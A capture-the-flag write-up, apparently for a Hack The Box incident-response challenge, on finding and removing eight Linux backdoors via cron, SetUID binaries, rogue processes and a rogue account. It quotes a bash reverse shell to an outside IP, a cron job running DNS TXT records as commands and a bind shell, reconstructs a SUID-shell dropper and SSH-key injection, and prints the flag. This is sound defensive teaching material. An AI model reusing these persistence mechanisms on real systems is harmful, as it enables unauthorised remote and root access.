Challenge brief
Hackers made it onto one of our production servers. We’ve isolated it from the internet until we can clean the machine up. The IR team reported eight different backdoors on the server but didn’t say what they were and we can’t get in touch with them. We need to get this server back into prod ASAP – we’re losing money every second it’s down. Please find the eight backdoors (both remote access and privilege escalation) and remove them.
Walkthrough
This one was a lot of fun because I rarely play around with Linux. I assumed at the start that there were eight separate elements to find, but it turns out there were really only four areas to look at: cron, SetUID permissions, rogue processes and a rogue account.
Cron
Cron is a great place to hide things, so first I looked for local cron jobs within “/var/spool/cron/crontabs/”, which had one entry for “user” – time to dump it.
# Check for cronjobs
sudo ls -la /var/spool/cron/crontabs/user
-rw------- 1 user crontab 250 May 14 2021 /var/spool/cron/crontabs/user

# Dump the contents
sudo cat /var/spool/cron/crontabs/user
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Fri May 14 15:03:30 2021)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
* * * * * /bin/sh -c "sh -c $(dig imf0rce.htb TXT +short @ns.imf0rce.htb)"
As shown above, this is a DNS beacon: every time the job fires, it queries the TXT record for imf0rce.htb and passes whatever that record contains straight to “sh -c”, so the attacker can run arbitrary commands just by changing the DNS record. Whilst root didn’t have a crontab entry of its own, there had to be something more, so I dumped all the configs within “/etc/cron*”, which turned up two files of interest in “/etc/cron.daily/”.
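A recursive listing is enough to eyeball everything that has been dropped into the system-wide cron directories; only the two suspicious entries are shown below.

# List every system-wide cron directory and config
sudo ls -laR /etc/cron*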
-rwxr-xr-x 1 root root 301 Apr 23 2021 access-up
-rwxr-xr-x 1 root root 199 Jan 24 2021 pyssh
The first file, “access-up”, was interesting as it basically generates a random six-character filename and drops a binary under that name into either “/bin” or “/sbin” with 4755 (SetUID root) permissions.
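As a rough sketch of that behaviour (the payload binary and the exact randomisation are assumptions on my part, not the real script):

#!/bin/bash
# Rough reconstruction of what access-up was described as doing - illustrative only
NAME=$(tr -dc 'a-z' < /dev/urandom | head -c 6)      # random six-character name
[ $((RANDOM % 2)) -eq 0 ] && DIR=/bin || DIR=/sbin   # pick /bin or /sbin
cp /bin/bash "$DIR/$NAME"                            # assumed payload: a copy of bash
chmod 4755 "$DIR/$NAME"                              # SetUID root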
The second file, “pyssh”, simply calls “/lib/python3/dist-packages/ssh_import_id_update”, which adds an SSH key to “/root/.ssh/authorized_keys”. The variables are just stored as base64-encoded strings.
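Again, only a sketch of the described behaviour – the key material is a placeholder and the variable names are mine:

#!/bin/bash
# Sketch of the described ssh_import_id_update behaviour - not the original file
KEY="c3NoLWVkMjU1MTkgQUFBQS4uLiBhdHRhY2tlcg=="   # base64 of a public-key line (placeholder)
DEST="L3Jvb3QvLnNzaC9hdXRob3JpemVkX2tleXM="      # base64 of /root/.ssh/authorized_keys
echo "$KEY" | base64 -d >> "$(echo "$DEST" | base64 -d)"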
To clean up the cronjobs I just ran the following
# As user, remove the cronjob
crontab -e

# As root, remove the malicious files and the entry from authorized_keys
rm /etc/cron.daily/access-up
rm /etc/cron.daily/pyssh
rm /lib/python3/dist-packages/ssh_import_id_update
vim /root/.ssh/authorized_keys
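If you would rather not open an editor, the whole user crontab can also be dropped in one go as root:

crontab -r -u user   # remove user's crontab entirely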
SetUID permissions
Whilst I expected this step to just be cleaning up whatever the cron job above had dropped, the search did turn up a few more files.
find / -user root -perm -4000 -printf "%-25p %t\n"
/home/user/.backdoor      Fri May 14 15:03:30.0000000000 2021
/root/solveme             Fri May 7 14:46:04.0000000000 2021
/usr/bin/newgrp           Thu May 28 06:37:47.0000000000 2020
/usr/bin/gpasswd          Thu May 28 06:37:47.0000000000 2020
/usr/bin/chfn             Thu May 28 06:37:47.0000000000 2020
/usr/bin/su               Tue Jul 21 07:49:28.0000000000 2020
/usr/bin/passwd           Thu May 28 06:37:47.0000000000 2020
/usr/bin/mount            Tue Jul 21 07:49:28.0000000000 2020
/usr/bin/chsh             Thu May 28 06:37:47.0000000000 2020
/usr/bin/umount           Tue Jul 21 07:49:28.0000000000 2020
/usr/bin/dlxcrw           Thu Jun 18 15:44:55.0000000000 2020
/usr/bin/mgxttm           Thu Jun 18 15:44:55.0000000000 2020
/usr/bin/sudo             Tue Jan 19 14:21:02.0000000000 2021
/usr/lib/openssh/ssh-keysign Tue Mar 9 14:17:50.0000000000 2021
/usr/lib/dbus-1.0/dbus-daemon-launch-helper Thu Jun 11 18:22:13.0000000000 2020
/usr/sbin/afdluk          Thu Jun 18 15:44:55.0000000000 2020
/usr/sbin/ppppd           Fri May 14 15:03:24.0000000000 2021
Filtering out the standard system binaries, I was left with the following.
/home/user/.backdoor      Fri May 14 15:03:30.0000000000 2021
/usr/bin/dlxcrw           Thu Jun 18 15:44:55.0000000000 2020
/usr/bin/mgxttm           Thu Jun 18 15:44:55.0000000000 2020
/usr/sbin/afdluk          Thu Jun 18 15:44:55.0000000000 2020
/usr/sbin/ppppd           Fri May 14 15:03:24.0000000000 2021
The first file is clearly malicious, and since the next three follow the random six-character naming pattern outlined above and were all created at exactly the same time, it’s safe to assume they need to go as well. The last file was interesting: “pppd” is a legitimate binary, but I couldn’t find any reference to “ppppd”, and executing it gave me a shell, so I’m assuming it’s bad and removing it too. If this weren’t a fun activity, I would dig deeper into each binary’s legitimacy before acting on such limited details – a couple of starting points are sketched below.
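For example, on a Debian/Ubuntu box you can ask the package manager whether anything owns a suspect file, and (if debsums happens to be installed) check that packaged binaries still match their shipped checksums:

dpkg -S /usr/sbin/ppppd          # no package claims it -> not part of a normal install
debsums -c                       # list packaged files whose checksums have changed
strings /usr/sbin/ppppd | less   # eyeball it for shell-spawning behaviour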
rm /home/user/.backdoor
rm /usr/bin/dlxcrw
rm /usr/bin/mgxttm
rm /usr/sbin/afdluk
rm /usr/sbin/ppppd
Rogue Processes
After following the cron job bouncing ball, I figured there had to be something currently running, and a simple process listing revealed it all.
ps -auxf
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0   2612   608 ?        Ss   11:38   0:00 /bin/sh -c /usr/sbin/sshd -D -p 23
root         8  0.0  0.0  12180  7336 ?        S    11:38   0:00 sshd: /usr/sbin/sshd -D -p 23 [listener] 0 of 10-100 startups
root         9  0.0  0.1  13896  8868 ?        Ss   11:40   0:00  \_ sshd: user [priv]
user        23  0.0  0.0  14692  7108 ?        S    11:40   0:00      \_ sshd: user@pts/0
user        24  0.0  0.0   5996  4016 pts/0    Ss   11:40   0:00          \_ -bash
root       198  0.0  0.0   8308  4548 pts/0    S    12:21   0:00              \_ sudo -i
root       199  0.0  0.0   5996  3924 pts/0    S    12:21   0:00                  \_ -bash
root       207  0.0  0.0   2592  1968 pts/0    S    12:21   0:00                      \_ alertd -e /bin/bash -lnp 4444
root       282  0.0  0.0   7892  3356 pts/0    R+   12:38   0:00                      \_ ps -auxf
root        19  0.0  0.0   3980  3016 ?        S    11:40   0:00 /bin/bash /var/lib/private/connectivity-check
root       280  0.0  0.0   3980   244 ?        S    12:38   0:00  \_ /bin/bash /var/lib/private/connectivity-check
I was lucky to run this as root first, because as the low-privileged user I didn’t see the alertd process at all, which means something in root’s profile must be spawning it. connectivity-check is obviously bad, and a dump of the file confirmed it: it’s mostly garbage (execution code), but at the bottom sat the code below, which was a nice confirmation.
while true; do nohup bash -i >& /dev/tcp/172.17.0.1/443 0>&1; sleep 10; done
To see when and how connectivity-check was being called, I simply grepped for it.
grep -R "connectivity-check" /etc
/etc/update-motd.d/30-connectivity-check:nohup /var/lib/private/connectivity-check &
Looking through “/root/.bashrc” confirmed that alertd is spawned whenever a root terminal is popped, and since, for reasons, root also owns “/home/user/.bashrc”, that file had to be replaced with a clean copy as well.
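I haven’t reproduced the exact line here, but based on the process listing above it was presumably something along these lines tacked onto the end of the file (the flags look like a netcat-style bind shell on port 4444):

# Reconstructed from the ps output, not the original .bashrc line
alertd -e /bin/bash -lnp 4444 &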
To clean this all up I ran the following
cp /etc/skel/.bashrc /root/.bashrc
cp /etc/skel/.bashrc /home/user/.bashrc
rm /etc/update-motd.d/30-connectivity-check
rm /var/lib/private/connectivity-check
rm /usr/bin/alertd
kill 207 19 280
New Account
The next obvious place to check was for malicious account creation or modification, which turned out to be a nice quick win.
cat /etc/passwd | grep -i "/bash"
root:x:0:0:root:/root:/bin/bash
gnats:x:41:0:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/bash
user:x:1000:1000::/home/user:/bin/bash
Clearly “gnats” is either a backdoored account or a very bad admin decision: a bug-reporting service account has no business with a login shell, let alone GID 0 (root’s primary group). So I just nerfed it.
usermod -s /usr/sbin/nologin gnats   # Disable logins
usermod -g 1000 gnats                # Change it from root's group
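A quick check afterwards confirms the account is actually neutered:

id gnats                      # primary group should no longer be 0 (root)
grep '^gnats:' /etc/passwd    # shell should now be /usr/sbin/nologin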
Woop there it is
Issue 1 is fully remediated
Issue 2 is fully remediated
Issue 3 is fully remediated
Issue 4 is fully remediated
Issue 5 is fully remediated
Issue 6 is fully remediated
Issue 7 is fully remediated
Issue 8 is fully remediated

Congrats: HTB{7tr3@t_hUntIng_4TW}